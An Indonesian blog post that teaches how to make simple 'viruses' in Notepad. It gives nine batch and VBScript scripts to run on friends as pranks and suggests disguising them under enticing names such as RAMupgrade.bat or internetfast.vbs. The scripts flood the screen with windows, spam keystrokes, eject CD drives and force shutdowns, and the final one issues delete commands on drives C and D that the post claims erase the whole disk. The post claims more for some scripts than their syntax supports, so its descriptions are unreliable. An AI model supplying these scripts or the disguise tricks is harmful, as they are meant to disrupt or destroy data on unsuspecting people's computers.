Cara Membuat Virus Sederhana Menggunakan Notepad

Kali ini ane akan menshare Cara Membuat Virus Sederhana Menggunakan Notepad. Virus ini memang sederhana, namun ada pula yang cukup mematikan. Anda bisa menggunakannya untuk menjahili teman Anda. Oke langsung saja..

1. Virus notepad, copy paste script berikut ini..
start

start

start

start

start

start

start

start

start

start

start

start

Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".bat". Contohnya baygon.bat
Pilih save as, type pilih all files. 

Efek : Membuat komputer hang karena membuka banyak CMD, semakin banyak tulisan "start" semakin banyak CMD yang dibuka
Level : Kurang Greget
Pengaruh : Sementara (Akan hilang jika direstart)

2. Virus notepad, copy paste script berikut ini
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".vbs". Contohnya mantap.vbs
Pilih save as, type pilih all files. 

Efek : Akan menekan backspace secara terus menerus
Level : Kurang Greget
Pengaruh : Sementara (Akan hilang jika direstart)

3. Virus notepad, copy paste script berikut ini
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".bat". Contohnya clickme.bat
Pilih save as, type pilih all files. 

Efek : Akan membuka notepad secara otomatis
Level : Kurang Greget
Pengaruh : Sementara (Akan hilang jika direstart)

4. Virus notepad, copy paste script berikut
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".vbs". Contohnya readme.vbs
Pilih save as, type pilih all files. 

Efek : Membuka dan menutup CD/DVD Drive secara otomatis
Level : Greget
Pengaruh : Sementara (Akan hilang jika direstart)

5. Virus notepad, copas script berikut ini
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".vbs". Contohnya josmantap.vbs
Pilih save as, type pilih all files. 

Efek : Capslock menjadi hidup-mati
Level : Kurang Greget
Pengaruh : Sementara (Akan hilang jika direstart)

6. Virus notepad, copas script ini
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".vbs". Contohnya PES2020.vbs
Pilih save as, type pilih all files. 

Efek : Komputer akan shutdown sendirinya
Level : Greget
Pengaruh : Sementara (Akan hilang jika direstart)

7. Virus notepad, copas ini
@echo shutdown -s -t 5 -f 
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".bat". Contohnya RAMupgrade.bat
Pilih save as, type pilih all files. 

Efek : Komputer akan shutdown sendirinya dalam waktu 5 detik
Level : Greget
Pengaruh : Sementara (Akan hilang jika direstart)

8. Virus notepad, copas ini
option explicit 
dim wshshell 
set wshshell=wscript.createobject(“wscript.shell”) 
dim x 
for x = 1 to 100000000 
wshshell.run “tourstart.exe” 
next
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".vbs". Contohnya internetfast.vbs
Pilih save as, type pilih all files. 

Efek : Komputer akan dipenuhi oleh 100000000 tourstart yang akan memenuhi layar monitor dan akan membuat komputer menjadi hang.
Level : Greget
Pengaruh : Sementara (Akan hilang jika direstart)

9. Virus notepad greget, copas ini
@echo off
DEL C: -Y
DEL D: -Y
Lalu simpan dengan nama sesuka hati Anda dengan berekstensi ".bat". Contohnya CSgo.bat
Pilih save as, type pilih all files. 

Efek : Menghapus seluruh data di hardisk tanpa terkecuali
Level : Super Greget
Pengaruh : Semi Kekal (harus instal ulang)

Credit: dikaeuphrosyne.blogspot.com
Itulah yang bisa saya sampaikan, semoga artikel ini bermanfaat buat kalian..
Terimakasih atas kunjungannya..
Previous
Next Post »